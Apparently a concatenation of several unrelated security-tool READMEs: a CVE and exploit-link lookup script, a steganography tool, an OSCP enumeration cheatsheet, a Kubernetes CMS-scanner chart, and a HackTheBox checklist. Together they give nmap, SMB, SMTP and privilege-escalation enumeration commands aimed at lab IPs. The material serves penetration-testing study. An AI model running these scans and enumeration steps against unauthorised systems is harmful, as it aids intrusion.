In order to take it one step further, the ExploitDB and SecurityFocus references are extracted from the CVE entries, which allows the script to provide direct links to the exploits. In order to provide perfect ExploitDB and SecurityFocus results for the vulnerabilities, curated lists will have to be used during database updates. If these lists are missing, ExploitDB and SecurityFocus links will still be displayed, but with issues: the SecurityFocus IDs are listed, but information is not available in the CVE entries themselves on whether the SecurityFocus exploit page has any content or not; similarly, the ExploitDB references seem to be missing quite a few entries.
The curated list for ExploitDB will act as a supplemental EDB-CVE map to the ones found in the CVE references. The SecurityFocus list is a list of SecurityFocus IDs with exploit entries, and this list will be used to determine whether a SecurityFocus CVE reference will be imported or not.
The following exploit databases are currently supported, with provided curated lists:
* **ExploitDB** at `nvd/exploitdb.lst`
* **SecurityFocus** at `nvd/securityfocus.lst`
* **Metasploit** at `nvd/metasploit.lst`
* **1337day** at `nvd/1337day.lst`
### Origin
The idea for this comes from my other open-source project, [Host Scanner](https://github.com/RoliSoft/Host-Scanner), which does exactly this, but is written in C++ and is focused more towards security researchers and system administrators, as opposed to CTF players.
The C++ version has a slightly different feature set compared to this Python version: while the main goal of the Python version is to parse nmap reports and end up at exploit links, the C++ version has its own active and passive network scanner, service identifier, and researcher-oriented features, such as non-intrusive vulnerability validation through package manager changelog reports.
### Usage
usage: vulnscan.py [-h] [-a] [-e] [-u] [query]
positional arguments:
query CPE name, full name and version to fuzzy match, or path to nmap report (generated with -sV)
optional arguments:
-h, --help show this help message and exit
-a, --all dump all vulnerabilities for a CPE when no version is included (off by default)
-e, --exploits dump only vulnerabilities with public exploits available
-u, --update download the CVE dumps and recreate the local database
#### Example run
$ ./vulnscan.py 'Apache 2.2.8'
[*] Performing fuzzy matching for Apache 2.2.8...
[*] Fuzzy-matched query to name cpe:/a:apache:http_server:2.2.8
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following vulnerabilities:
** or **
$ ./vulnscan.py nmap_scan.xml
[*] Processing nmap report nmap_scan.xml...
[*] Service 192.168.1.84:80/tcp is cpe:/a:apache:http_server:2.2.8
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following vulnerabilities:
>>> CVE-2014-0231 The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechani >
>>> CVE-2014-0098 The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP >
>>> CVE-2013-6438 The dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Serv >
>>> CVE-2013-2249 mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proc >
>>> CVE-2013-1896 mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV i >
>>> CVE-2013-1862 mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 write >
>>> CVE-2012-4558 Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the >
>>> CVE-2012-3499 Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before >
>>> CVE-2012-2687 Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mo >
>>> CVE-2012-0883 envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length direc >
>>> CVE-2012-0053 protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header >
>>> CVE-2012-0031 scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause >
>>> CVE-2011-4415 The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and >
>>> CVE-2011-4317 The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, >
>>> CVE-2011-3639 The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18 >
>>> CVE-2011-3607 Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0. >
>>> CVE-2011-3368 The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, >
>>> CVE-2011-3348 The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_ >
>>> CVE-2011-3192 The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x throu >
>>> CVE-2011-0419 Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apach >
>>> CVE-2010-1452 The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 all >
>>> CVE-2010-0434 The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2. >
>>> CVE-2010-0425 modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63 >
>>> CVE-2010-0408 The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Se >
>>> CVE-2009-3555 The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Inter >
>>> CVE-2009-2699 The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Por >
>>> CVE-2009-1891 The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until comp >
>>> CVE-2009-1890 The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HT >
>>> CVE-2009-1195 The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=Inc >
>>> CVE-2008-2939 Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apac >
>>> CVE-2008-2364 The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in >
>>> CVE-2007-6750 The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (da >
[*] Entry cpe:/a:apache:http_server:2.2.8 has the following public exploits:
>>> CVE-2014-0231
- Apache HTTP Server CVE-2014-0231 Remote Denial of Service
http://www.securityfocus.com/bid/68742/exploit
>>> CVE-2014-0098
- Apache HTTP Server Multiple Denial of Service
http://www.securityfocus.com/bid/66303/exploit
>>> CVE-2013-6438
- Apache HTTP Server Multiple Denial of Service
http://www.securityfocus.com/bid/66303/exploit
>>> CVE-2013-1862
- Apache HTTP Server Terminal Escape Sequence in Logs Command Injection
http://www.securityfocus.com/bid/59826/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-4558
- Apache HTTP Server Multiple Cross Site Scripting
http://www.securityfocus.com/bid/58165/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-3499
- Apache HTTP Server Multiple Cross Site Scripting
http://www.securityfocus.com/bid/58165/exploit
- RETIRED: Oracle January 2014 Critical Patch Update Multiple
http://www.securityfocus.com/bid/64758/exploit
>>> CVE-2012-2687
- Apache HTTP Server HTML-Injection And Information Disclosure
http://www.securityfocus.com/bid/55131/exploit
>>> CVE-2012-0053
- Apache - httpOnly Cookie Disclosure
https://www.exploit-db.com/exploits/18442
- Apache HTTP Server 'httpOnly' Cookie Information Disclosure
http://www.securityfocus.com/bid/51706/exploit
>>> CVE-2012-0031
- Apache HTTP Server Scoreboard Local Security Bypass
http://www.securityfocus.com/bid/51407/exploit
>>> CVE-2011-4317
- Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass
https://www.exploit-db.com/exploits/36352
>>> CVE-2011-3639
- Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass
https://www.exploit-db.com/exploits/36663
>>> CVE-2011-3607
- Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation
http://www.securityfocus.com/bid/50494/exploit
>>> CVE-2011-3368
- Apache mod_proxy - Reverse Proxy Exposure (PoC)
https://www.exploit-db.com/exploits/17969
- Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure
http://www.securityfocus.com/bid/49957/exploit
- Apache Reverse Proxy Bypass Vulnerability Scanner
metasploit auxiliary/scanner/http/rewrite_proxy_bypass
>>> CVE-2011-3348
- Apache HTTP Server CVE-2011-3348 Denial Of Service
http://www.securityfocus.com/bid/49616/exploit
>>> CVE-2011-3192
- Apache - Remote Denial of Service (Memory Exhaustion)
https://www.exploit-db.com/exploits/17696
- Apache - Denial of Service
https://www.exploit-db.com/exploits/18221
- Apache HTTP Server CVE-2011-3192 Denial Of Service
http://www.securityfocus.com/bid/49303/exploit
- Apache Range Header DoS (Apache Killer)
metasploit auxiliary/dos/http/apache_range_dos
>>> CVE-2011-0419
- Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service
https://www.exploit-db.com/exploits/35738
>>> CVE-2010-0434
- Apache 'mod_isapi' Memory Corruption
http://www.securityfocus.com/bid/38494/exploit
>>> CVE-2010-0425
- Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit
https://www.exploit-db.com/exploits/11650
- Win32 - Write-to-file Shellcode (278 bytes)
https://www.exploit-db.com/exploits/14288
- Apache 'mod_isapi' Memory Corruption
http://www.securityfocus.com/bid/38494/exploit
- Apache mod_isapi Dangling Pointer
metasploit auxiliary/dos/http/apache_mod_isapi
>>> CVE-2009-3555
- TLS - Renegotiation (PoC)
https://www.exploit-db.com/exploits/10579
- Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass
https://www.exploit-db.com/exploits/10071
- Multiple Vendor TLS Protocol Session Renegotiation Security
http://www.securityfocus.com/bid/36935/exploit
>>> CVE-2009-1195
- Apache 'Options' and 'AllowOverride' Directives Security Bypass
http://www.securityfocus.com/bid/35115/exploit
>>> CVE-2008-2939
- Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting
http://www.securityfocus.com/bid/30560/exploit
## Licensing
Copyright (c) `2017` `RoliSoft <[email protected]>`
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but without any warranty; without even the implied warranty of merchantability or fitness for a particular purpose.
For more information regarding the terms and conditions of this software, please read the full legal text of the GNU General Public License version 3, a copy of which is available in the [LICENSE.md](LICENSE.md) file. Otherwise, see <<http://www.gnu.org/licenses/>>.
Some of the invoked tools are licensed under GPL or a form of GPL-derived license with added clauses further restricting how data produced by the tool can be processed, e.g. nmap. |
# stegify
[![Build Status](https://travis-ci.org/DimitarPetrov/stegify.svg?branch=master)](https://travis-ci.org/DimitarPetrov/stegify)
[![Coverage Status](https://coveralls.io/repos/github/DimitarPetrov/stegify/badge.svg?branch=master)](https://coveralls.io/github/DimitarPetrov/stegify?branch=master)
[![GoDoc](https://godoc.org/github.com/DimitarPetrov/stegify?status.svg)](https://godoc.org/github.com/DimitarPetrov/stegify)
[![Go Report Card](https://goreportcard.com/badge/github.com/DimitarPetrov/stegify)](https://goreportcard.com/report/github.com/DimitarPetrov/stegify)
[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)
## Overview
`stegify` is a simple command line tool capable of fully transparent hiding any file within an image or set of images.
This technique is known as LSB (Least Significant Bit) [steganography](https://en.wikipedia.org/wiki/steganography)
## Demonstration
| Carrier | Data | Result |
| ---------------------------------------| ------------------------------------|------------------------------------------------------|
| ![Original File](examples/street.jpeg) | ![Data file](examples/lake.jpeg) | ![Encoded File](examples/test_decode.jpeg) |
The `Result` file contains the `Data` file hidden in it. And as you can see it is fully transparent.
If multiple `Carrier` files are provided, the `Data` file will be split in pieces and every piece is encoded in the respective carrier.
| Carrier1 | Carrier2 | Data | Result1 | Result2 |
| ---------------------------------------------|--------------------------------------------|--------------------------------------------|------------------------------------------------------------------|------------------------------------------------------------------|
| <img src="examples/street.jpeg" width="500"> | <img src="examples/lake.jpeg" width="500"> | <img src="examples/video.gif" width="500"> | <img src="examples/test_multi_carrier_decode1.jpeg" width="500"> | <img src="examples/test_multi_carrier_decode2.jpeg" width="500"> |
The `Result1` file contains one half of the `Data` file hidden in it and `Result2` the other. As always fully transparent.
## Installation
#### Installing from Source
```
go install github.com/DimitarPetrov/stegify@latest
```
#### Installing via Homebrew (macOS)
```
brew tap DimitarPetrov/stegify
brew install stegify
```
Or you can download a binary for your system [here](https://github.com/DimitarPetrov/stegify/releases).
## Usage
### As a command line tool
#### Single carrier encoding/decoding
```
stegify encode --carrier <file-name> --data <file-name> --result <file-name>
stegify decode --carrier <file-name> --result <file-name>
```
When encoding, the file with name given to flag `--data` is hidden inside the file with name given to flag
`--carrier` and the resulting file is saved in new file in the current working directory under the
name given to flag `--result`.
> **_NOTE:_** The result file won't have any file extension and therefore it should be specified explicitly in `--result` flag.
When decoding, given a file name of a carrier file with previously encoded data in it, the data is extracted
and saved in new file in the current working directory under the name given to flag `--result`.
> **_NOTE:_** The result file won't have any file extension and therefore it should be specified explicitly in `--result` flag.
In both cases the flag `--result` could be omitted and default values will be used.
#### Multiple carriers encoding/decoding
```
stegify encode --carriers "<file-names...>" --data <file-name> --results "<file-names...>"
OR
stegify encode --carrier <file-name> --carrier <file-name> ... --data <file-name> --result <file-name> --result <file-name> ...
stegify decode --carriers "<file-names...>" --result <file-name>
OR
stegify decode --carrier <file-name> --carrier <file-name> ... --result <file-name>
```
When encoding a data file in more than one carriers, the data file is split in *N* chunks, where *N* is number of provided carriers.
Each of the chunks is then encoded in the respective carrier.
> **_NOTE:_** When decoding, carriers should be provided in the **exact** same order for result to be properly extracted.
This kind of encoding provides one more layer of security and more flexibility regarding size limitations.
In both cases the flag `--result/--results` could be omitted and default values will be used.
> **_NOTE:_** When encoding the number of the result files (if provided) should be equal to the number of carrier files. When decoding, exactly one result is expected.
When multiple carriers are provided with mixed kinds of flags, the names provided through `carrier` flag are taken first and with `carriers/c` flags second.
Same goes for the `result/results` flag.
### Programmatically in your code
`stegify` can be used programmatically too and it provides easy to use functions working with file names
or raw Readers and Writers. You can visit [godoc](https://godoc.org/github.com/DimitarPetrov/stegify) under
`steg` package for details.
## Disclaimer
If carrier file is in jpeg or jpg format, after encoding the result file image will be png encoded (therefore it may be bigger in size)
despite of file extension specified in the result flag.
## Showcases
### 🚩 Codefest’19
`stegify` was used for one of the *Capture The Flag* challenges in [**Codefest’19**](https://www.hackerrank.com/codefest19-ctf).
Participants were given a photo of a bunch of "innocent" cats. Nothing suspicious right? Think again!
You can read more [here](https://medium.com/bugbountywriteup/codefest19-ctf-writeups-a8f4e9b45d1) and [here](https://medium.com/@markonsecurity/image-challenges-1-cats-are-innocent-right-69cd4220bc99).
|
# Offensive Security Ultimate Cheatsheet
The goal of this repository is not to spoil the OSCP Exam, it's to save you as much time as possible when enumerating and exploiting potential low hanging fruit. It's very easy to get caught up in the weeds of debugging and troubleshooting broken payloads only to lose out on all your time to pass the exam.
You're on your own when the exploits start flying--I'll try to include potential tips and tricks you can try but it's up to you to fully understand the proper material before starting the exam. :)
-------------
![Hacker](lol_hoody.jpg)
-------------
## Start Here
| # | Step | Description |
| --- | --- | --- |
| 1 | `Discover` | Discover what's on the network |
| 2 | `Document` | Document your findings in CherryTree |
| 3 | `Select` | Select the specific cheatsheet for the box you are attacking |
-------------
# 1 - Discover
Before you can follow my exploitation tips and tricks, you'll need to enumerate what's on the network.
## Automated OSCP Enumeration Script
Use these automated tools to save as much time as possible when enumerating vulnerabilities!
| # | Resource | Description |
| --- | --- | --- |
| 1 | [Reconnoitre](https://github.com/codingo/Reconnoitre) | A tool specifically created for scanning OSCP labs. |
| 2 | [AutoRecon](https://github.com/Tib3rius/AutoRecon) | A tool for scanning both CTFs and OSCP. |
## Manual Scanning Commands
### Nmap
| # | Command | Description |
| --- | --- | --- |
| 1 | `nmap -sn 10.11.1.0/24` | Enum IPs. Quick SYN scan without looking for open ports. |
| 2 | `nmap -sC -sV -vv -oA quick 10.11.1.4` | Quick TCP scan on target IP |
| 3 | `nmap -sU -sV -vv -oA quick_udp 10.11.1.7` | Quick UDP scan on target IP |
| 4 | `nmap -sV -O -F --version-light 10.11.1.6` | Quick OS Detection & Port Scan on target IP |
| 5 | `nmap -sC -sV -p- -vv -oA full 10.11.1.8` | Very long and aggressive TCP scan on target IP |
### Interesting Ports
| Port # | Description |
| --- | --- |
| 21 | FTP server, unencrypted. |
| 22 | SSH server, can be connected to via SSH |
| 23 | Telnet. Basically an unencrypted SSH |
| 25 | SMTP - Email sending service. [Query it](#SMTP-Email-Enumeration) to enum email addresses? |
| 69 | TFTP Server. Very uncommon and old. Uses UDP. |
| 80 | HTTP Server, hosting website? Try visiting IP with web browser |
| 88 | Kerboros Service. Check, [MS14-068](https://labs.f-secure.com/archive/digging-into-ms14-068-exploitation-and-defence/) |
| 110 | POP3 mail service. Login via telnet or SSH? |
| 111 | RPCbind. This can help us look for NFS-shares |
| 119 | Network Time Protocol |
| 135 | MSRPC - Microsoft RPC |
| 139 | SMB Service. likely vulnerable to an SMB RCE |
| 161, 162 | SNMP Service |
| 389, 636 | LDAP Directory Service |
| 443 | HTTPS, check for HeartBleed? View certificate for information? |
| 445 | SMB Shares service, likely vulnerable to an SMB RCE |
| 587 | Submission. If Postfix is run on it, it could be vunerable to shellshock |
| 631 | CUPS. Basically a Linux Printer Service for sharing printers. |
| 1433 | Default MSSQL port. `sqsh -S 10.1.11.41 -U sa` |
| 1521 | Oracle DB. `tnscmd10g version -h 10.1.11.51` |
| 2021 | Oracle XML DB. Check [Default Passwords](https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm) |
| 2049 | Network File System. `showmount -e 10.1.11.64` |
| 3306 | MySQL Database. Connect: `mysql --host=10.1.11.69 -u root -p`|
| 3389 | Listening for RDP connection |
### Nmap Enum Scripts
| # | Script | Type | Description |
| --- | --- | --- | --- |
| 1 | [smb-check-vulns.nse](https://github.com/mubix/tools/blob/master/nmap/scripts/smb-check-vulns.nse) | SMB | Scans for multiple SMB vulnerabilities. |
| 2 | [smb-vuln-cve2009-3103.nse](https://www.exploit-db.com/exploits/9594) | SMB | Windows Vista SP1/SP2 and Server 2008 (x86) |
| 3 | [smb-vuln-ms06-025.nse](https://www.exploit-db.com/exploits/1940) | SMB | Windows 2000 and Windows XP (x86) |
| 4 | [smb-vuln-ms07-029.nse](https://www.exploit-db.com/exploits/16366) | SMB | Windows 2003 SP1/SP2 |
| 5 | [smb-vuln-ms08-067.nse](https://www.exploit-db.com/exploits/40279) | SMB | Windows XP |
| 6 | [smb-vuln-ms10-054.nse](https://www.exploit-db.com/exploits/14607) | SMB | XP, Vista, 7 |
| 7 | [smb-vuln-ms10-061.nse](https://www.exploit-db.com/exploits/16361) | SMB | XP, Vista, 7 |
| 8 | [smb-vuln-ms17-010.nse](https://www.exploit-db.com/exploits/42315) | SMB | EternalBlue. XP, Vista, 7, 8.1, 10 |
| 9 | [smb-enum-shares.nse](https://github.com/nmap/nmap/blob/master/scripts/smb-enum-shares.nse) | SMB | Enumerates SMB Shares |
| 10 | [smb-enum-users.nse](https://github.com/nmap/nmap/blob/master/scripts/smb-enum-users.nse) | SMB | Attempts to enumerate Windows users |
*Example: Using an Nmap Script*
```
nmap -p 445 -vv --script=[script.nse] 10.10.10.10
```
## Linux Enumeration
```
enum4linux -a 10.11.1.9
```
### Banner Grabbing
| # | Command | Description |
| --- | --- | --- |
| 1 | /dev/tcp/$ip/$port | If nmap didn't banner grab or it's not installed. |
### DNS Zone Transfer
| # | Command | Description |
| --- | --- | --- |
| 1 | `dig example.com any` | View DNS records on a domain. |
| 2 | `dnsrecon -d example.com` | Multiple queries to DNS server that enumerates DNS records. |
### SMTP Email Enumeration
| # | Command | Description |
| --- | --- | --- |
| 1 | `nmap -script smtp-commands.nse 10.11.1.41` | Scan for possible SMTP commands that can be executed |
| 2 | `smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.41` | SMTP Enum. `-M` for mode. `-U` for userlist. `-t` for target |
|
---
title: "CMSeeK"
category: "scanner"
type: "CMS"
state: "released"
appVersion: "v.1.1.3"
usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities"
---
<!--
SPDX-FileCopyrightText: 2021 iteratec GmbH
SPDX-License-Identifier: Apache-2.0
-->
<!--
.: IMPORTANT! :.
--------------------------
This file is generated automatically with `helm-docs` based on the following template files:
- ./.helm-docs/templates.gotmpl (general template data for all charts)
- ./chart-folder/.helm-docs.gotmpl (chart specific template data)
Please be aware of that and apply your changes only within those template files instead of this file.
Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml`
--------------------------
-->
<p align="center">
<a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a>
<a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a>
<a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a>
<a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a>
<a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a>
</p>
## What is CMSeeK?
CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions.
Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities.
To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK).
## Deployment
The cmseek chart can be deployed via helm:
```bash
# Install HelmChart (use -n to configure another namespace)
helm upgrade --install cmseek secureCodeBox/cmseek
```
## Scanner Configuration
The CMSeeK targets are specified with the `-u` parameter. The target should be a URL.
Additional CMSeeK scan features can be configured via the parameter attribute.
Some useful example parameters listed below:
- `-u URL, --url URL` : Target Url.
- `--follow-redirect` : Follows all/any redirect(s).
- `--no-redirect` : skips all redirects and tests the input target(s)
- `-r, --random-agent`: Use a random user agent.
- `--googlebot`: Use Google bot user agent.
- `--user-agent USER_AGENT`: Specify a custom user agent
## Requirements
Kubernetes: `>=v1.11.0-0`
## Values
| Key | Type | Default | Description |
|-----|------|---------|-------------|
| cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner |
| parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository |
| parser.image.tag | string | defaults to the charts version | Parser image tag |
| parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. |
| parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
| scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) |
| scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) |
| scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) |
| scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) |
| scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) |
| scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) |
| scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images |
| scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan |
| scanner.image.tag | string | `nil` | defaults to the charts appVersion |
| scanner.nameAppend | string | `nil` | append a string to the default scantype name. |
| scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) |
| scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) |
| scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated |
| scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. |
| scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode |
| scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system |
| scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user |
| scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) |
| scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ |
## License
[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license].
[scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox
[scb-docs]: https://docs.securecodebox.io/
[scb-site]: https://www.securecodebox.io/
[scb-github]: https://github.com/secureCodeBox/
[scb-twitter]: https://twitter.com/secureCodeBox
[scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU
[scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
|
# HackTheBox CheckList
Mark Down version of Cherry Tree template by **devzspy** : [https://github.com/devzspy/oscp-certification/blob/master/Note Taking Tools/CherryTree Template/CTF\_template.ctb](https://github.com/devzspy/oscp-certification/blob/master/Note%20Taking%20Tools/CherryTree%20Template/CTF_template.ctb)
This is a template for working on steps to follow when attempting a Hack the Box machine
_Machine Name_: \(10.10.10.ddd\)
## 1. Enumeration
### TCP
### UDP
### Web Services
* Nikto
* gobuster
* WebDav
* CMS
**Other Services**
* SMB
* SNMP
* DB
* Other
## 2. Exploitation
### Service Exploited:
### Vulnerability Type:
### Exploit POC:
### Description:
### Discovery of Vulnerability
### Exploit Code Used
### Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel
## 3. Post-Exploitation
### Script Results
### Host Information
### File System
### Running Processes
### Installed Applications
### Users & Groups
### Network
### Scheduled Jobs
### Privilege Escalation
## Goodies
### Hashes
### Passwords
### Proof/Flags/Other
## Software Version
### Software Versions
### Potential Exploits
## Methodology
## Network Scanning
☐ nmap -sn 10.11.1.0/24 ☐ nmap -sL 10.11.1.0/24 ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree
### Individual Host Scanning
☐ nmap --top-ports 20 --open ipaddress ☐ nmap -sS -A -sV -O -p- ipaddress -oA nmap ☐ nmap -sU ipaddress ☐ searchsploit -x --nmap nmap.xml ☐ dig axfr @ipaddress dc
### Service Scanning
```text
WebApp
☐ Nikto
☐ gobuster -u http://ipaddress -w /usr/share/wordlists/common.txt -s 200,204,301,302,307,403 -r -t 15 -o gobuster.txt
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software
```
## Exploitation
☐ Gather Version Numbers ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software
## Post Exploitation
```text
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py
☐ find / -perm -4000 2>/dev/null | xargs ls -la
Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
